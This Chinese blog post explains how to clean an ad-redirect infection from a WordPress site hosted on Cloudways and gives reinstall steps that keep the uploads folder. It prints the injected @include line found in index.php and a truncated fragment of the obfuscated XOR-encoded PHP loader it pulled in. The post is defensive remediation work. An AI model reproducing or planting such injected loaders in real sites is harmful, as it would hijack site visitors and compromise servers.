近日,我遇到了一位客户的问题:他们使用Cloudways服务器搭建的WordPress网站,在使用手机访问时,系统会自动跳转到第三方广告网站,这明显是感染了广告跳转病毒。为了解决这个问题,本文将详细记录清理病毒的过程。
这种病毒的工作原理与以前遇到的类似,通常是通过插件或WordPress本身的漏洞,将恶意代码植入服务器上。从服务器中某个文件(如index.php)中,我们发现了一串加密的代码:
<?php
/*85ba2*/
@include ("/homx65/10579**.cloudwaysapps.com/zmwjzux65gcg/public_html/wpx2dincludx65s/blocks/sitx65x2dtitlx65/.c963ccx65x65.oti");
/*85ba2*/
这一段代码指向名为.c963ccee.oti的文件。该文件包含的部分内容如下:
<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");
虽然代码较长且难以完全解密,但凭借经验,我们可以判定此代码属于病毒文件。正常的WordPress文件都是开源的,不应包含加密代码。
除了这个病毒文件,我们在相应目录下还发现了其他恶意文件,这里就不一一列举。通过分析病毒的感染方法,我们得出清理的方法相对简单:删除这些病毒文件,并将其替换为正常文件。
最直接的方式是彻底删除旧有的WordPress文件,然后重新安装。不过,在此过程中,不要忘记保留/uploads目录下的文件,以免导致网站图片的丢失。
由于Cloudways是托管型的VPS,用户权限有限,如果使用SFTP或SSH无法删除病毒文件,则需联系客服进行处理。
以下是感染后在Cloudways上处理网站病毒的具体步骤:
- 备份当前中毒状态的网站数据作为预备;
- 请求客服删除除了wp-content/uploads文件夹以外的所有文件和文件夹(因为权限不足,需客服协助);
- 重新下载WordPress安装包,进行网站的全新安装;
- 安装之前使用过的主题和插件。
按照上述步骤操作后,病毒文件将被彻底清除。
本站资源来源于网络,仅限用于学习和研究目的,请勿用于其他用途。如有侵权请发送邮件至vizenaujmaslak9@hotmail.com删除。:FGJ博客 » 如何在CloudWays上清理被病毒感染的网站